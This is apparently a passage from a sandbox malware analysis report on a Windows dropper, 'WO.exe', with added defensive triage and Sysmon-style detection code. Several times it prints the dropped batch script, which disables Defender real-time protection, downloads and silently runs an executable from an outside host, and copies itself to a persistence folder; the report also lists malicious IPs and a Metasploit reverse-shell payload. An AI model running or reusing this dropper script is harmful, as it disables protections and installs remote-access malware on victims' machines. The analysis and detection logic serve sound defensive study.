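        SuspiciousTasks                  = @(Get-SuspiciousScheduledTasks |
                                             Select-Object -ExpandProperty TaskName)
        C2ConnectionActive               = Test-C2Connection
    }
}

Invoke-WOTriage | Format-List
```

Run it in an elevated session so the scheduled-task enumeration and TCP table are complete. The task check uses the action path, not just the task name, because the task names are trivially changed while the HiddenScripts drop location is what the persistence actually needs; the Defender check reads the Policies hive specifically, since that is the key the report shows being written.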
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        147.185.221.23reddit.exeGet hashmaliciousMetasploitBrowse
                                          dr2YKJiGH9.exeGet hashmaliciousXWormBrowse
                                            jSm8N1jXbk.exeGet hashmaliciousS400 RATBrowse
                                              enigma_loader.exeGet hashmaliciousXWormBrowse
                                                exe006.exeGet hashmaliciousSheetRatBrowse
                                                  yF21ypxRB7.exeGet hashmaliciousXWormBrowse
                                                    9GlCWW6bXc.exeGet hashmaliciousXWormBrowse
                                                      fiPZoO6xvJ.exeGet hashmaliciousXWormBrowse
                                                        EternalPredictor.exeGet hashmaliciousBlank Grabber, Skuld Stealer, XWormBrowse
                                                          eternal.exeGet hashmaliciousXWormBrowse
                                                            No context
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            A2HOSTINGUSv4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                                            • 209.124.66.28
                                                            t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                            • 209.124.66.28
Memo - Impairment Test 2023 MEX010B (5).js | malicious | Unknown | 66.198.240.43
236236236.elf | malicious | Unknown | 68.66.200.215
sh4.elf | malicious | Unknown | 68.66.210.5
rebirth.arm.elf | malicious | Mirai, Okiru | 185.148.129.20
https://sunnycloudtechnologies.com/suncn/msd.html | malicious | HTMLPhisher | 68.66.226.73
rebirth.mpsl.elf | malicious | Mirai, Okiru | 185.149.112.83
List of required items and services pdf.vbs | malicious | GuLoader, RHADAMANTHYS | 209.124.66.28
List of required items pdf.vbs | malicious | GuLoader | 209.124.66.28
SALSGIVERUSreddit.exe | malicious | Metasploit | 147.185.221.23
loligang.mpsl.elf | malicious | Mirai | 147.176.119.110
horrify's Modx Menu v1.exe | malicious | XWorm | 147.185.221.24
fvbhdyuJYi.exe | malicious | XWorm | 147.185.221.24
8DiSW8IPEF.exe | malicious | XWorm | 147.185.221.24
twE44mm07j.exe | malicious | XWorm | 147.185.221.18
YgJ5inWPQO.exe | malicious | AsyncRAT, XWorm | 147.185.221.18
dr2YKJiGH9.exe | malicious | XWorm | 147.185.221.23
KJhsNv2RcI.exe | malicious | XWorm | 147.185.221.24
PjGz899RZV.exe | malicious | XWorm | 147.185.221.24
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 3b5074b1b5d032e5620f69f9f700ff0e
ChoForgot.exe | malicious | Vidar | 185.151.51.214
payment_3493.pdf | malicious | Unknown | 185.151.51.214
1lhZVZx5nD.exe | malicious | Stealc, Vidar | 185.151.51.214
Archivo-PxFkiLTWYG-23122024095010.hta | malicious | Unknown | 185.151.51.214
acronis recovery expert deluxe 1.0.0.132.rarl.exe | malicious | LummaC | 185.151.51.214
Archivo-PxFkiLTWYG-23122024095010.hta | malicious | Unknown | 185.151.51.214
Ref#20203216.exe | malicious | AgentTesla | 185.151.51.214
YYjRtxS70h.exe | malicious | Unknown | 185.151.51.214
YYjRtxS70h.exe | malicious | Unknown | 185.151.51.214
nTyPEbq9wQ.lnk | malicious | Unknown | 185.151.51.214
                                                            No context
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:modified
                                                            Size (bytes):64
                                                            Entropy (8bit):0.34726597513537405
                                                            Encrypted:false
                                                            SSDEEP:3:Nlll:Nll
                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                            Malicious:false
                                                            Preview:@...e...........................................................
                                                            Process:C:\Users\user\Desktop\WO.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):2513
                                                            Entropy (8bit):4.996405902922014
                                                            Encrypted:false
                                                            SSDEEP:48:RzZ+iRM0nUOpqeld8wXm/Nld5cn/W5ktwKOvV4vGSkt0:COUiZDVm/NDyHwK+n0
                                                            MD5:C0E9BC2DFFF6E08DF8196809B9BBF253
                                                            SHA1:006E88EA359145C40A6BBCA55E6F21B387999255
                                                            SHA-256:43C1DFAFAC6C340F420057606F317C2D0D3182C04F1A9C76B782F818C85F4F11
                                                            SHA-512:5B0C012ACA5479BF3B8852E1504465CCB2AD6CE4134EE8D2AD57C898FD91AC19F96A669EBC3A9201E65099ED1723F4515B48CA25EA21681AD45377CE3D9CA60C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat, Author: Joe Security
Preview:
    @shift /0
    @echo off

    :: Disable Windows Defender Real-Time Protection immediately
    powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    echo Real-Time Protection disabled immediately.

    :: Check and delete existing reddit.exe in %temp%
    if exist "%temp%\reddit.exe" (
        del /f /q "%temp%\reddit.exe"
        echo Previous reddit.exe deleted.
    )

    :: Download reddit.exe
    powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', '%temp%\reddit.exe')"
    echo reddit.exe downloaded.

    :: Run reddit.exe minimized
    start "" /min "%temp%\reddit.exe"
    echo reddit.exe is now running.

    :: Create the HiddenScripts folder (not hidden but still in AppData)
    set "hiddenDir=%appdata%\HiddenScripts"
    mkdir "%hiddenDir%" >nul 2>&1

    :: Copy this script to HiddenScripts and make it accessible
    set "originalScript=%~nx0"
    copy "%~f0" "%hiddenDir%\%originalScript%" /Y >nul
    attrib -h "%hiddenDir%\%ori
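The dropped batch file above performs four observable steps: it turns off Defender real-time protection with Set-MpPreference, pulls an .exe into %temp% with WebClient.DownloadFile, starts that .exe from %temp%, and copies itself into %appdata%\HiddenScripts. The following detection logic is an added example, not code from the report or from the sample; it runs over constructed Sysmon-style process-creation and file-creation records (the record format, process IDs and paths are assumptions made for the example) and correlates the individual hits on the cmd.exe that interprets the script. One point a practitioner should note: cmd.exe expands %temp% before powershell.exe starts, so logged command lines contain the expanded path, and the rules below match that rather than the literal "%temp%" shown in the preview.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed process-creation (Sysmon EID 1, Detail = CommandLine) and
# file-creation (Sysmon EID 11, Detail = TargetFilename) records, made up for
# this example to mirror what the dropped .bat would produce. They are not
# taken from the Joe Sandbox report. Field order:
# EventID|ProcessId|ParentProcessId|Image|Detail
SAMPLE_LOG = r"""
1|4120|3980|C:\Windows\System32\cmd.exe|cmd /c ""C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat" "
1|4188|4120|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
1|4260|4120|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
11|4260|4120|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Users\user\AppData\Local\Temp\reddit.exe
1|4300|4120|C:\Users\user\AppData\Local\Temp\reddit.exe|"C:\Users\user\AppData\Local\Temp\reddit.exe"
11|4120|3980|C:\Windows\System32\cmd.exe|C:\Users\user\AppData\Roaming\HiddenScripts\4784.bat
1|5000|1234|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -Command "Get-MpPreference | Select-Object DisableRealtimeMonitoring"
11|5100|1234|C:\Windows\System32\notepad.exe|C:\Users\user\Documents\notes.txt
"""

@dataclass
class Event:
    event_id: int
    pid: int
    ppid: int
    image: str
    detail: str

@dataclass
class Finding:
    rule: str
    pid: int
    chain_key: int
    evidence: str

# An .exe directly under the user's Temp directory (the expanded %temp%).
TEMP_EXE = re.compile(r"\\AppData\\Local\\Temp\\[^\\\s]+?\.exe\b", re.I)

def parse_log(text):
    events = []
    for line in text.strip().splitlines():
        # maxsplit=4 keeps any '|' inside a PowerShell command line intact
        eid, pid, ppid, image, detail = line.split("|", 4)
        events.append(Event(int(eid), int(pid), int(ppid), image, detail))
    return events

# One rule per step of the dropped batch script.
def defender_rtp_disabled(ev):
    return ev.event_id == 1 and re.search(
        r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true", ev.detail, re.I) is not None

def webclient_download_to_temp(ev):
    return (ev.event_id == 1
            and re.search(r"Net\.WebClient\)?\.DownloadFile\(", ev.detail, re.I) is not None
            and TEMP_EXE.search(ev.detail) is not None)

def exe_written_to_temp(ev):
    return ev.event_id == 11 and TEMP_EXE.search(ev.detail) is not None

def exe_run_from_temp(ev):
    return ev.event_id == 1 and TEMP_EXE.search(ev.image) is not None

def script_copied_to_hiddenscripts(ev):
    return ev.event_id == 11 and re.search(
        r"\\AppData\\Roaming\\HiddenScripts\\", ev.detail, re.I) is not None

RULES = [defender_rtp_disabled, webclient_download_to_temp, exe_written_to_temp,
         exe_run_from_temp, script_copied_to_hiddenscripts]

def chain_key(ev):
    # The cmd.exe interpreting the .bat is the hub of the chain: its own file
    # writes are keyed by its pid, its child processes' actions by their ppid.
    return ev.pid if ev.image.lower().endswith("\\cmd.exe") else ev.ppid

def detect(log_text):
    findings = []
    for ev in parse_log(log_text):
        for rule in RULES:
            if rule(ev):
                findings.append(Finding(rule.__name__, ev.pid, chain_key(ev), ev.detail))
    return findings

def dropper_chains(findings, min_rules=3):
    """Hub processes under which at least min_rules distinct rules fired.
    A lone Set-MpPreference hit can be an admin; the combination cannot."""
    by_hub = defaultdict(set)
    for f in findings:
        by_hub[f.chain_key].add(f.rule)
    return {hub: sorted(rules) for hub, rules in by_hub.items() if len(rules) >= min_rules}

if __name__ == "__main__":
    hits = detect(SAMPLE_LOG)
    for f in hits:
        print(f"{f.rule:32} pid={f.pid:<5} {f.evidence[:70]}")
    print("dropper chains:", dropper_chains(hits))
```

The benign Get-MpPreference query and the notepad file write in the constructed log produce no findings, and the five malicious steps collapse onto the single cmd.exe hub (pid 4120), which is the unit an analyst would want to triage as one incident rather than five alerts.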
                                                            Process:C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):2513
                                                            Entropy (8bit):4.996405902922014
                                                            Encrypted:false
                                                            SSDEEP:48:RzZ+iRM0nUOpqeld8wXm/Nld5cn/W5ktwKOvV4vGSkt0:COUiZDVm/NDyHwK+n0
                                                            MD5:C0E9BC2DFFF6E08DF8196809B9BBF253
                                                            SHA1:006E88EA359145C40A6BBCA55E6F21B387999255
                                                            SHA-256:43C1DFAFAC6C340F420057606F317C2D0D3182C04F1A9C76B782F818C85F4F11
                                                            SHA-512:5B0C012ACA5479BF3B8852E1504465CCB2AD6CE4134EE8D2AD57C898FD91AC19F96A669EBC3A9201E65099ED1723F4515B48CA25EA21681AD45377CE3D9CA60C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\481A.tmp\481B.tmp\481C.bat, Author: Joe Security
Preview:
    @shift /0
    @echo off

    :: Disable Windows Defender Real-Time Protection immediately
    powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    echo Real-Time Protection disabled immediately.

    :: Check and delete existing reddit.exe in %temp%
    if exist "%temp%\reddit.exe" (
        del /f /q "%temp%\reddit.exe"
        echo Previous reddit.exe deleted.
    )

    :: Download reddit.exe
    powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', '%temp%\reddit.exe')"
    echo reddit.exe downloaded.

    :: Run reddit.exe minimized
    start "" /min "%temp%\reddit.exe"
    echo reddit.exe is now running.

    :: Create the HiddenScripts folder (not hidden but still in AppData)
    set "hiddenDir=%appdata%\HiddenScripts"
    mkdir "%hiddenDir%" >nul 2>&1

    :: Copy this script to HiddenScripts and make it accessible
    set "originalScript=%~nx0"
    copy "%~f0" "%hiddenDir%\%originalScript%" /Y >nul
    attrib -h "%hiddenDir%\%ori
                                                            Process:C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):2513
                                                            Entropy (8bit):4.996405902922014
                                                            Encrypted:false
                                                            SSDEEP:48:RzZ+iRM0nUOpqeld8wXm/Nld5cn/W5ktwKOvV4vGSkt0:COUiZDVm/NDyHwK+n0
                                                            MD5:C0E9BC2DFFF6E08DF8196809B9BBF253
                                                            SHA1:006E88EA359145C40A6BBCA55E6F21B387999255
                                                            SHA-256:43C1DFAFAC6C340F420057606F317C2D0D3182C04F1A9C76B782F818C85F4F11
                                                            SHA-512:5B0C012ACA5479BF3B8852E1504465CCB2AD6CE4134EE8D2AD57C898FD91AC19F96A669EBC3A9201E65099ED1723F4515B48CA25EA21681AD45377CE3D9CA60C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\6F6D.tmp\6F7E.tmp\6F7F.bat, Author: Joe Security
Preview:
    @shift /0
    @echo off

    :: Disable Windows Defender Real-Time Protection immediately
    powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    echo Real-Time Protection disabled immediately.

    :: Check and delete existing reddit.exe in %temp%
    if exist "%temp%\reddit.exe" (
        del /f /q "%temp%\reddit.exe"
        echo Previous reddit.exe deleted.
    )

    :: Download reddit.exe
    powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', '%temp%\reddit.exe')"
    echo reddit.exe downloaded.

    :: Run reddit.exe minimized
    start "" /min "%temp%\reddit.exe"
    echo reddit.exe is now running.

    :: Create the HiddenScripts folder (not hidden but still in AppData)
    set "hiddenDir=%appdata%\HiddenScripts"
    mkdir "%hiddenDir%" >nul 2>&1

    :: Copy this script to HiddenScripts and make it accessible
    set "originalScript=%~nx0"
    copy "%~f0" "%hiddenDir%\%originalScript%" /Y >nul
    attrib -h "%hiddenDir%\%ori
                                                            Process:C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):2513
                                                            Entropy (8bit):4.996405902922014
                                                            Encrypted:false
                                                            SSDEEP:48:RzZ+iRM0nUOpqeld8wXm/Nld5cn/W5ktwKOvV4vGSkt0:COUiZDVm/NDyHwK+n0
                                                            MD5:C0E9BC2DFFF6E08DF8196809B9BBF253
                                                            SHA1:006E88EA359145C40A6BBCA55E6F21B387999255
                                                            SHA-256:43C1DFAFAC6C340F420057606F317C2D0D3182C04F1A9C76B782F818C85F4F11
                                                            SHA-512:5B0C012ACA5479BF3B8852E1504465CCB2AD6CE4134EE8D2AD57C898FD91AC19F96A669EBC3A9201E65099ED1723F4515B48CA25EA21681AD45377CE3D9CA60C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\7038.tmp\7039.tmp\703A.bat, Author: Joe Security
Preview:
    @shift /0
    @echo off

    :: Disable Windows Defender Real-Time Protection immediately
    powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    echo Real-Time Protection disabled immediately.

    :: Check and delete existing reddit.exe in %temp%
    if exist "%temp%\reddit.exe" (
        del /f /q "%temp%\reddit.exe"
        echo Previous reddit.exe deleted.
    )

    :: Download reddit.exe
    powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', '%temp%\reddit.exe')"
    echo reddit.exe downloaded.

    :: Run reddit.exe minimized
    start "" /min "%temp%\reddit.exe"
    echo reddit.exe is now running.

    :: Create the HiddenScripts folder (not hidden but still in AppData)
    set "hiddenDir=%appdata%\HiddenScripts"
    mkdir "%hiddenDir%" >nul 2>&1

    :: Copy this script to HiddenScripts and make it accessible
    set "originalScript=%~nx0"
    copy "%~f0" "%hiddenDir%\%originalScript%" /Y >nul
    attrib -h "%hiddenDir%\%ori
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):73802
                                                            Entropy (8bit):6.316899506372099
                                                            Encrypted:false
                                                            SSDEEP:1536:I15v3HYXkOXlgX3p+f4RYuL47YzAnsVebkTsT5Wj6Mb+KR0Nc8QsJq39:Y5v3Y0O1u3pplqvnsG+8e0Nc8QsC9
                                                            MD5:23544090C6D379E3ECA7343C4F05D4D2
                                                            SHA1:C9250E363790A573E9921A68B7ABE64F27E63DF1
                                                            SHA-256:B439D22ED2C1E1F83F3C52D1A7307D9AEE8B516166AB221CB6D67B188CD80F56
                                                            SHA-512:6ACA78B0653E87AC80D7F562E6AB6D650F4D53D375CAD043EB9613C7BBD642F7F82564A872B1B05520A77ACBEBA9DA0540C4CD5A855A28A8188EBE3A4B57775C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: C:\Users\user\AppData\Local\Temp\reddit.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_MetasploitPayload, Description: Yara detected Metasploit Payload, Source: C:\Users\user\AppData\Local\Temp\reddit.exe, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: C:\Users\user\AppData\Local\Temp\reddit.exe, Author: unknown
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 89%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8...Y...Y...Y...E...Y..TE...Y...F...Y...F...Y...Y...Y..TQ..Y...z...Y..._...Y..Rich.Y..................PE..L....5EJ.............................%............@..........................`..............................................l...x....P...............................................................................................................text...f........................... ..`.rdata..............................@..@.data...\p.......@..................@....rsrc........P......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\System32\cmd.exe
                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):129024
                                                            Entropy (8bit):6.5063374280780675
                                                            Encrypted:false
                                                            SSDEEP:3072:a2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcX011:7bJhs7QW69hd1MMdxPe9N9uA0hu9TBZn
                                                            MD5:7176B040816932541EB9C2B91D90B29B
                                                            SHA1:137A9C4620366CAFF2A1D1C297B6AE8C6D28761D
                                                            SHA-256:DB9756031D99DCDDAE9E9254BD76156A580331A43802B6FAA68D2FD62C5B7E95
                                                            SHA-512:1332645E8C6B53994B4F3F28B980C1FE646CEC1771E77982A85EC4036725F4F2930BD9A45CAEA8A03B8A8ECE0B432955B0D55E09396F5A80FD7C0D2825B0D1DE
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 58%
